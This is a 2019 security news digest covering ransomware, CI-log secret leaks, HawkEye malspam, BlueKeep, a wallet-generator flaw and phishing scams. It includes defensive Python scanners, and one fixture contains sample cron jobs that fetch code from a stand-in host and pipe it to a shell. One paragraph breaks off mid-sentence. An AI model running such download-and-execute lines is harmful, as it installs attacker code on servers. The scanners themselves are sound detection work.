
Cyware Daily Threat Intelligence, May 28, 2019


Malspam has always been a preferred attack vector for threat actors to drop dangerous malware. Given the ease with which they are carried out, malspam attacks have taken a toll on a range of businesses and users. Recently, security researchers have come across a series of malspam campaigns that are being used to distribute both HawkEye Reborn v8.0 and HawkEye Reborn v9.0. These campaigns are actively targeting business employees and customers in an effort to steal both account credentials and other sensitive details.   

New details regarding the recently disclosed BlueKeep vulnerability have also surfaced in the past 24 hours. Several medical products made by Siemens Healthineers have been found to be affected by the flaw, tracked as CVE-2019-0708. It lies in Windows Remote Desktop Services (RDS) and allows an unauthenticated attacker to execute arbitrary code and, because it is wormable, to spread from machine to machine across a network. Siemens has published six security advisories describing the impact of this vulnerability on its products.

Top Breaches Reported in the Last 24 Hours

The city of Laredo suffers an attack
The city of Laredo’s document management system was encrypted in a ransomware attack on May 22, 2019. City officials contained the malware quickly, and systems were back in operation from May 23, 2019. Computers used by the Fire, Police, Utilities, and Health departments remained down until May 24, 2019 to contain the situation, which led to manual

Yidao Yongche targeted
China-based ride-hailing firm Yidao Yongche fell victim to multiple cyber attacks on May 25 and May 26, 2019, which shut down its servers and encrypted its core data. The attackers reportedly demanded a large amount of Bitcoin to restore the encrypted data. The firm has reported the incident to the Beijing Cyber Police Center and is working on a compensation plan for the affected users.

Travis CI keeps logs
A team of seven bug bounty hunters has found that several Continuous Integration (CI) services, including Travis CI, Circle CI, and GitLab CI, still expose secrets belonging to many companies inside their build logs. The researchers urge users of CI services to review their build logs for sensitive tokens that slip past the services’ basic pattern-based masking, and to rotate any that have been exposed.
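As an added example (not code from the researchers or from any CI vendor), the following scanner shows the kind of review the paragraph asks for: it runs a few credential patterns over build-log lines and, because CI masking only hides the literal secret string, it also decodes base64-looking blobs and rescans them. The log lines, the AWS documentation placeholder keys and the JWT-shaped token are constructed for the example; the patterns are a starting set, not a complete one.

```python
import base64
import binascii
import re

# Structured credential formats plus a generic "NAME_WITH_SECRET=value" rule.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "bearer_token": re.compile(r"\bBearer\s+([A-Za-z0-9._~+/\-]{20,}=*)"),
    "slack_token": re.compile(r"\bxox[abpr]-[0-9A-Za-z\-]{10,}"),
    "secret_assignment": re.compile(
        r"(?i)\b\w*(?:SECRET|TOKEN|PASSWORD|PASSWD|API_?KEY)\w*\s*[=:]\s*['\"]?([^\s'\"]{8,})"
    ),
}
# A run of base64 alphabet characters long enough to hide an encoded secret.
B64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{32,}={0,2}(?![A-Za-z0-9+/=])")


def redact(value):
    """Keep just enough of a matched value to recognise it in a report."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "..." + value[-2:]


def scan_text(text, origin="plain", _depth=0):
    """Return (line_no, kind, origin, redacted_value) for every secret found.
    Base64-looking blobs are decoded and rescanned once: CI masking hides the
    literal secret, not an encoded copy of it (an env dump, a debug print)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                findings.append((line_no, kind, origin, redact(value)))
        if _depth:
            continue
        for m in B64_BLOB.finditer(line):
            try:
                decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                continue  # not base64, or binary: nothing to rescan
            for _, kind, _, value in scan_text(decoded, "base64", _depth=1):
                findings.append((line_no, kind, "base64", value))
    return findings


# Constructed sample build log. The AWS values are the placeholders from AWS's
# own documentation and the bearer token is made up; none are real secrets.
_B64_DUMP = base64.b64encode(
    b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY").decode()
SAMPLE_LOG = f"""\
[build] Cloning repository...
[build] export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
[build] export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[build] curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJjaSJ9.4B1T8nXk2QzLw9mV0Y7dK3pJ6fH8sR2tU5vW1xC9bA0" https://api.example.test/deploy
[build] DEBUG env dump (b64): {_B64_DUMP}
[build] Tests passed: 128/128
"""

if __name__ == "__main__":
    for line_no, kind, origin, value in scan_text(SAMPLE_LOG):
        print(f"line {line_no}: {kind} ({origin}) {value}")
```

Point the scanner at logs pulled from the CI API (public build logs of open-source projects are the ones attackers actually read); every hit is a token to rotate, not just to delete from the log, since the log has already been served to whoever fetched it.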

Top Malware Reported in the Last 24 Hours

HawkEye keylogger returns
Two versions of the HawkEye keylogger are being used in massive malspam campaigns targeting business users worldwide, with the sole aim of stealing account credentials and other sensitive information. The attackers use spam servers located in Estonia to send emails that appear to come from Spanish banks or legitimate companies. Each email carries an attachment posing as a commercial invoice which, if opened, drops the malware onto the victim’s system.

New persistent malware infection
Attackers are achieving persistence on compromised WordPress and Joomla sites by installing a cron job that periodically downloads malware from a third-party domain, hestonsflorists[.]com. Because the job lives in the crontab rather than in the site’s files, the malware is re-downloaded even after the owner has cleaned the website files or restored them from a backup; the scheduled task has to be removed as well, or the site is re-infected.
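As an added example (not code from the researchers who reported the campaign), here is a small crontab triage script that flags download-and-execute jobs of the kind described above. It parses user-crontab lines, scores each job on a few traits (fetches a URL, pipes into an interpreter, decodes a payload, touches the web root, runs every few minutes) and reports jobs that fetch remote content plus at least one other trait. The sample crontab, the malicious.example domain and the heuristics are constructed for the example; they are not the page’s indicators.

```python
import re

# Heuristics for a download-and-execute cron job (constructed for this example).
DOWNLOADER = re.compile(r"\b(?:wget|curl|fetch|lynx)\b")
URL = re.compile(r"https?://[^\s'\"|;]+")
PIPE_TO_INTERPRETER = re.compile(
    r"\|\s*(?:/usr/bin/|/bin/)?(?:sh|bash|dash|zsh|perl|php|python[23]?)\b")
DECODE_STAGE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")
WEB_ROOT = re.compile(r"/var/www|public_html|wp-content|/htdocs")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
SPECIAL = {"@hourly": 60, "@daily": 1440, "@midnight": 1440, "@weekly": 10080,
           "@monthly": 43200, "@yearly": 525600, "@annually": 525600, "@reboot": None}


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job in a user crontab,
    skipping comments, blank lines and VAR=value lines."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            parts = [" ".join(fields[:5]), fields[5]] if len(fields) == 6 else []
        if len(parts) == 2:
            yield line_no, parts[0], parts[1]


def run_interval_minutes(schedule):
    """Approximate run interval from the minute field ('*' -> 1, '*/N' -> N)
    or a @special name; None when it cannot be read off simply."""
    if schedule.startswith("@"):
        return SPECIAL.get(schedule)
    minute = schedule.split()[0]
    if minute == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute)
    return int(step.group(1)) if step else None


def assess_job(schedule, command):
    """Return the list of suspicious traits a job exhibits."""
    reasons = []
    if DOWNLOADER.search(command) and URL.search(command):
        reasons.append("fetches remote content")
    if PIPE_TO_INTERPRETER.search(command):
        reasons.append("pipes into an interpreter")
    if DECODE_STAGE.search(command):
        reasons.append("decodes an obfuscated payload")
    if WEB_ROOT.search(command):
        reasons.append("touches the web root")
    interval = run_interval_minutes(schedule)
    if interval is not None and interval <= 10:
        reasons.append(f"runs every {interval} min")
    return reasons


def find_reinfection_jobs(text):
    """Flag jobs that fetch remote content and show at least one other trait."""
    flagged = []
    for line_no, schedule, command in parse_crontab(text):
        reasons = assess_job(schedule, command)
        if "fetches remote content" in reasons and len(reasons) >= 2:
            flagged.append((line_no, command, reasons))
    return flagged


# Constructed sample crontab, not captured from a real compromise.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/local/bin/site-backup.sh >/dev/null 2>&1
*/5 * * * * wget -q -O - http://malicious.example/dl.php | sh >/dev/null 2>&1
@hourly curl -s http://malicious.example/p.txt | base64 -d > /var/www/html/wp-content/.x.php
30 6 * * 1 /usr/bin/apt-get update -qq
"""

if __name__ == "__main__":
    for line_no, command, reasons in find_reinfection_jobs(SAMPLE_CRONTAB):
        print(f"line {line_no}: {command}\n    {', '.join(reasons)}")
```

Feed it the output of `crontab -l` for every account on the host (the web server’s user included), plus /etc/crontab and the files under /etc/cron.d; systemd timers and at jobs are the same idea in a different place. A hit is removed together with the file cleanup, not after it, or the next scheduled run undoes the cleanup.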

Top Vulnerabilities Reported in the Last 24 Hours

Siemens medical products vulnerable
Several products made by Siemens Healthineers are affected by the recently patched Windows vulnerability known as BlueKeep (CVE-2019-0708). The flaw is wormable: an unauthenticated attacker can execute code and take control of a device over Remote Desktop Services without any user interaction. It affects older Windows versions, including Windows 7, Windows Server 2008 and 2008 R2, Windows XP and Windows Server 2003. Where a device cannot be patched promptly, enabling Network Level Authentication (NLA) and blocking TCP port 3389 from untrusted networks reduce the exposure, since NLA requires valid credentials before the vulnerable code path is reached.

A bug in WalletGenerator.net
A vulnerability has been disclosed in the online cryptocurrency paper wallet generator WalletGenerator.net: the same private/public key pairs were being issued to multiple users. The flaw was introduced by changes to the code served from WalletGenerator.net. The bad code was discovered in August 2018 but was only fixed in May 2019. Anyone who generated a wallet on the site in that window should assume the key may not be unique and move any funds to a wallet generated with a trusted tool run offline.
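The digest does not say why the generator repeated keys, so the following added example (not WalletGenerator.net’s code) makes an assumption to illustrate the failure class: a generator that seeds a non-cryptographic PRNG from the current second, so every user who clicks in the same second receives the same key. Next to it is the CSPRNG-based version, and a black-box uniqueness audit a user can run against any generator’s output before trusting it: generate many keys and count how many are distinct.

```python
import math
import random
import secrets
import time

KEY_BYTES = 32  # a raw 256-bit private key, as used by secp256k1-based wallets


def weak_private_key(now=None):
    """Constructed flawed generator (an assumption for illustration, not the
    site's actual code): seeds random.Random with the current second, so all
    callers within the same second receive an identical key."""
    seed = int(time.time() if now is None else now)
    return random.Random(seed).getrandbits(8 * KEY_BYTES).to_bytes(KEY_BYTES, "big")


def strong_private_key():
    """Keys drawn from the OS CSPRNG; 256-bit collisions do not happen in practice."""
    return secrets.token_bytes(KEY_BYTES)


def audit_generator(keygen, n):
    """Black-box uniqueness check: generate n keys and report how many are
    distinct, plus the upper bound on entropy that count implies (log2 of the
    distinct count). A healthy generator returns n distinct keys."""
    keys = {keygen() for _ in range(n)}
    return {
        "generated": n,
        "distinct": len(keys),
        "entropy_bound_bits": math.log2(len(keys)),
    }


if __name__ == "__main__":
    for name, gen in (("weak (time-seeded)", weak_private_key),
                      ("strong (secrets)", strong_private_key)):
        print(name, audit_generator(gen, 1000))
```

A distinct count far below the number generated is proof of a broken generator; a count equal to it is only the absence of that particular symptom. Because the flaw was in the served JavaScript rather than the published source, the audit has to run against what the browser actually received, or the generator should be run from a verified copy on an offline machine.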

Top Scams Reported in the Last 24 Hours

New phishing scam targets ANZ customers
Australia and New Zealand Banking Group (ANZ) has warned its customers about a new phishing scam aimed at stealing banking details. The email appears to come from ANZ and reports a successful BPAY transaction, asking the recipient to view it in their ‘Transaction History’ via a link in the email. The link leads to a spoofed ANZ website that asks for the user’s login details. Once those are entered, the user is redirected to a page claiming the account has been blocked and asking for the answers to three challenge questions.

Tech support scam
Three people have been arrested for allegedly duping victims out of a total of $1.3 million in tech support scams. Posing as employees of major tech companies, they called victims to tell them their computers were infected with a virus, and also sent fake alert messages linking to a fraudulent website that gave the scammers remote access to victims’ computers. Most victims paid between $225 and $799 for fake multi-year service plans.



Posted on: May 28, 2019
